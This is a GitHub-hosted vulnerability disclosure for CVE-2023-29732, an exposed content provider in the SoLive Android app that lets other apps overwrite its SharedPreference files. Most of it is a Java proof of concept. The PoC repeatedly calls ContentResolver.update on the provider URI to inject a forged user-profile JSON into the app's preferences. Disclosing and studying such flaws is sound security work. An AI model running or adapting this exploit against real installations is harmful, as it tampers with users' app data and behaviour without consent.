Headline
CVE-2023-29732: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs
SoLive 1.6.14 thru 1.6.20 for Android exists exposed component, the component provides the method to modify the SharedPreference file. The attacker can use the method to modify the data in any SharedPreference file, these data will be loaded into the memory when the application is opened. Depending on how the data is used, this can result in various attack consequences, such as ad display exceptions.
Escalation of Privileges exists in SoLive(CVE-2023-29732)
Vendor:SoLive App(https://so-live.web.app/)
Affected product:SoLive(com.matchtech.solive)
Version:1.6.14,1.6.20
Download link:https://play.google.com/store/apps/details?id=com.matchtech.solive&hl=en_US&gl=US
Description of the vulnerability for use in the CVE:SoLive 1.6.14 thru 1.6.20 for Android exists exposed component, the component provides the method to modify the SharedPreference file. The attacker can use the method to modify the data in any SharedPreference file, these data will be loaded into the memory when the application is opened. Depending on how the data is used, this can result in various attack consequences, such as ad display exceptions.
poc:
public void attack(){ ContentResolver contentResolver = this.getApplicationContext().getContentResolver(); String randomString =getRandomString(512); Uri uri = Uri.parse(“content://com.matchtech.solive.TTMultiProvider/t_sp/contain/” + “zztest” + “?sp_file_name=adjust_preferences”); while (true) { ContentValues contentValues = new ContentValues(); contentValues.put("apiUserProfile", “{\"is_verified\":false,\"is_favorite\":false,\"uid\":\"FlG4hFCFrxPQMQ2UfejzeJuzoy92\",\"b\":2,\"c\":3,\"d\":0,\"lang\":\"jp\",\"bio\":\"hack\",\"workTitle\":\"hack\",\"workCompany\":\"hack\",\"education\":\"hack\",\"redactedName\":\"T*******\",\"name\":\"hack\",\"ppImageURL\":\"https://d2veheavfolhls.cloudfront.net/pp%2FFlG4hFCFrxPQMQ2UfejzeJuzoy92%2Fd8350738-45da-4221-a648-5082259139c5?alt\\u003dmedia\",\"ppImageID\":\"d8350738-45da-4221-a648-5082259139c5\",\"country\":{\"code\":\"HK\",\"name\":\"Hong Kong SAR China\",\"flag\":\"https://d2veheavfolhls.cloudfront.net/misc%2Fflags%[email protected]?alt\\u003dmedia\"},\"birthday\":\"1999-11-29T06:22:00.000Z\",\"age\":99,\"popularity\":1000,\"like_count\":-1,\"shared_id\":\"123456789\",\"favorite_count\":0,\"self_favorite_count\":3,\"ppImages\":[{\"ID\":\"d8350738-45da-4221-a648-5082259139c5\",\"URL\":\"https://d2veheavfolhls.cloudfront.net/pp%2FFlG4hFCFrxPQMQ2UfejzeJuzoy92%2Fd8350738-45da-4221-a648-5082259139c5?alt\\u003dmedia\",\"review_status\":0}],\"profileVideos\":[{\"ID\":\"d4f68235-630c-46b2-b45a-b9716b4ee6da\",\"URL\":\"https://d2veheavfolhls.cloudfront.net/pv%2FFlG4hFCFrxPQMQ2UfejzeJuzoy92%2Fd4f68235-630c-46b2-b45a-b9716b4ee6da?alt\\u003dmedia\",\"thumbnailURL\":\"https://d2veheavfolhls.cloudfront.net/pvt%2FFlG4hFCFrxPQMQ2UfejzeJuzoy92%2Fd4f68235-630c-46b2-b45a-b9716b4ee6da?alt\\u003dmedia\",\"review_status\":0}]}”); contentResolver.update(uri,contentValues,null,null); } }